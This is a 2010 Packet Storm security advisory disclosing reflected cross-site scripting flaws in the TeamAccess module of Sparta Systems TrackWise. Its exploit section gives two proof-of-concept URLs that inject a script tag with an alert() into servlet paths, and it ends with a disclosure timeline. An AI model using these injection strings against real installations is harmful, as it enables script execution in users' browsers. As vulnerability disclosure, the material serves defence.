Sparta Systems TrackWise TeamAccess Cross Site Scripting

2010-03-03T00:00:00
ID PACKETSTORM:86845
Type packetstorm
Reporter Yaniv Miron
Modified 2010-03-03T00:00:00

Description

                                        
                                            `=========================================  
Yaniv Miron aka "Lament" Advisory Feb 28, 2010  
Sparta Systems TrackWise TeamAccess module Multiple Cross Site Scripting Vulnerabilities  
=========================================  
  
=====================  
I. BACKGROUND  
=====================  
TrackWise® by Sparta Systems: A Holistic Approach to Enterprise Quality Management   
  
TrackWise by Sparta Systems is an enterprise quality management solution (EQMS)  
that optimizes quality, ensures compliance and reduces costs for world-class clients  
across a range of industries. TrackWise is the only enterprise quality management solution that offers the flexibility and configurability   
  
to adapt to company-specific business processes,  
enabling our world-class clients across a range of industries to define, track, manage   
and report on the core activities vital to their success.  
  
http://www.spartasystems.com/trackwise-eqms/  
  
=====================  
II. DESCRIPTION  
=====================  
  
A malicious attacker may inject scripts into the TrackWise application.  
  
=====================  
III. ANALYSIS  
=====================  
  
Exploitation of this vulnerability results in the execution of arbitrary  
code using a malicious link.  
  
=====================  
IV. EXPLOIT  
=====================  
  
http://example.com/[TrackWiseDir]/servlet/TeamAccess/Login/"><script>alert('XSS-By-Lament')</script>  
  
http://example.com/[TrackWiseDir]/servlet/TeamAccess/BatchEditProgress.html/"><script>alert('XSS-By-Lament')</script>  
  
=====================  
V. DISCLOSURE TIMELINE  
=====================  
  
Jan 2009 Vulnerability Found  
Jan 2009 Vendor Notification  
Feb 2010 Public Disclosure  
  
=====================  
VI. CREDIT  
=====================  
  
Yaniv Miron aka "Lament".  
lament@ilhack.org  
`